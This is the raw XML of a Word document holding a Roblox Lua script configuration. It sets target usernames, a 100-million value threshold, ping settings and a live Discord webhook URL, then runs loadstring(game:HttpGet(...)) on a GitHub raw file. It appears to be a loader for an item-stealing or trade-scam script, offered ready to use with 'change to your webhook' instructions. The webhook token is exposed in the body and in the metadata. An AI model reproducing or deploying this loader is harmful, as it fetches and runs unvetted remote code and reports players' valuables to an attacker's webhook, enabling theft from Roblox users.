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1FAB9" w14:textId="701B53CD" w:rsidR="005F6AE9" w:rsidRDefault="005F6AE9">
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G.Usernames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = {“killer_35b”, “user2”, “user3”} – you can add as many as you’d like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C77A1" w14:textId="14F72E53" w:rsidR="005F6AE9" w:rsidRDefault="005F6AE9">
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G.min_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 100000000 – 100 million</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17562F09" w14:textId="1A652DDB" w:rsidR="005F6AE9" w:rsidRDefault="005F6AE9">
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G.pingEveryone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = “Yes” – change to “No” if you don’t want pings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057340D" w14:textId="57AEB271" w:rsidR="005F6AE9" w:rsidRDefault="005F6AE9">
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G.webhook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="005E2568">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://discord.com/api/webhooks/1315285887776460870/-CL6TVz7BbPdl82Xu-In65lNIr3S2GUDvlHeEpAkNjB50b2j_yokUA-yBVBeEGRNP5Pj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> – change to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webhook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73B79535" w14:textId="7DDDE34E" w:rsidR="005F6AE9" w:rsidRDefault="0012193E">
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="005F6AE9">
        <w:t>oadstring(game:HttpGet(</w:t>
      </w:r>
      <w:r>
        <w:t>https://raw.githubusercontent.com/exeter21/aaaksjak/refs/heads/main/source.lua</w:t>
      </w:r>
      <w:r w:rsidR="005F6AE9">
        <w:t>))()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6605AF" w14:textId="77777777" w:rsidR="005F6AE9" w:rsidRDefault="005F6AE9"/>
    <w:sectPr w:rsidR="005F6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E9"/>
    <w:rsid w:val="0012193E"/>
    <w:rsid w:val="005F6AE9"/>
    <w:rsid w:val="008C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CD951"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8BB468BD-FCF9-E54D-B996-27E76C50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A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6A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iscord.com/api/webhooks/1315285887776460870/-CL6TVz7BbPdl82Xu-In65lNIr3S2GUDvlHeEpAkNjB50b2j_yokUA-yBVBeEGRNP5P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Sup</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yo Sup</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-28T05:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-28T05:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>